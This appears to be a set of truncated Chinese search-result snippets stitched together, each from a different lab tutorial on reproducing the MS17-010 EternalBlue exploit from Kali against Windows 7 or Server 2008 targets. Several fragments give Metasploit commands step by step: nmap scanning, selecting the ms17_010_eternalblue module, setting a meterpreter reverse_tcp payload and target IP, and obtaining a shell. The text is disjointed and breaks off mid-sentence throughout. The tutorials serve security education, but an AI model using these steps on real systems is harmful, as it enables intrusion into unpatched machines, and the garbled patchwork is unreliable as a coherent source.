注意:使用Kali机为攻击机,被攻击电脑为win7系统的虚拟机,关闭防火墙扫描端口启动模块查询并使用第一个那个设置攻击负载,设置被攻击的ip,设置攻击者kaliiprun启动等待一下,当显示WIN的时候就是说明已经获得了对方的shell控制权限此时就是获得了一个meterpreter会

永恒之蓝漏洞复现(ms17-010)环境信息收集先扫描目标靶机IP进入MSF查看是否存在永恒之蓝的漏洞攻击永恒之蓝漏洞复现(ms17-010)环境攻击机：kali靶机：WindowsServer2008信息收集对ip进行收集开放什么端口先扫描目标靶机IP因为在同一个内网之中所以可以使用arp-

文章目录环境说明1MS17_010简介2MS17_010复现过程3MS17_010安全加固环境说明渗透机操作系统：kali-linux-2024.1-installer-amd64漏洞复现操作系统:cn_windows_7_professional_with_sp1_x64_dvd_u_6770311MS17_010简介MS17_010漏洞后门利用程序EternalB

msf打永恒之蓝操作启动msf后，可以查看ms17-010的相关漏洞searchms17-010选用payload类型setpayloadwindows/x64/meterpreter/reverse_tcp选择漏洞利用类型：永恒之蓝setexploitwindows/smb/ms17_010_eternalblue设置攻击地址setrhost192.168.208.176攻

//输入命令对IP进行完整的扫描nmap-T4-A-vip //输入命令启用msfmsfconsole //输入命令进行漏洞搜索searchms17-010 //选择使用攻击模块use0//设置攻击负载setpayloadwindows/x64/meterpreter/reverse_tcp//设置受害者IPsetrhostxxx.xxx.xxx.xxx/

永恒之蓝简介永恒之蓝是指2017年4月14日晚，黑客团体ShadowBrokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及

Metasploit是一款开源的安全漏洞检测工具，同时Metasploit是免费的工具。Metasploit核心中绝大部分有Rudy实现，一小部分由汇编和C语言实现。 文件结构与模块：路径:/usr/share/metasploit-framework/config:MSF环境配置信息，数据库配置信息data:后渗透模块的一些工具及pa

作者：susususuao免责声明：本文仅供学习研究，严禁从事非法活动，任何后果由使用者本人负责。一.什么是永恒之蓝？-永恒之蓝永恒之蓝(EternalBlue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。而SMB服务是一个协议名，它能被用于Web连接和客

用nmap的漏洞扫描模式nmap--script=vuln192.168.178.128可以发现，靶机上扫到了4个漏洞，其中包括了MS17-010。 打开metasploit（msf很有意思的是,每次打开都会显示不同的画面。）msfconsole 搜索ms17-010相关模块，可以看到一共找到了6个不同的模块。（选项：0-5）searchms17-010

永恒之蓝漏洞利用一、启动MSFmsfconsole┌──(root㉿kali)-[~]└─#msfconsole                          

 漏洞介绍：MS17-010又称永恒之蓝漏洞，利用Windows系统的SMB漏洞可以获取系统最高权限。最有名的安全事件就是不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。攻击

一、ms17-010漏洞复现（1）启用msf （2）搜索msf中和ms17-010漏洞相关的脚本   （3）使用ms17-010的辅助模块脚本（即搜到的3号模块）   （4）配置辅助模块脚本相关内容

用到的试验机kaliip192.168.1.106windows2008  ip  192.168.1.107用kali扫描靶机端口   这里看到445端口是开放的，可以利用17_010使用命令msfconsole启

0x01：温馨提示微软已于2017年发布MS17-010补丁，修复了“永恒之蓝”攻击的系统漏洞，一定要及时更新Windows系统补丁。本次只是简易的复现MS17-010，成功的水准就是取得Shell

一、环境准备功击方：kali（192.168.43.132）目标机：win7（192.168.43.134）win7打开smb服务漏洞的产生：Sbm服务445端口二、扫描1.nmap扫描2、使用msf的auxiliary二次判

靶场下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/01.靶场环境攻击机：kali（192.168.232.130）靶机：windows7（外网：192.168.232.155，内网：192.168.52.143）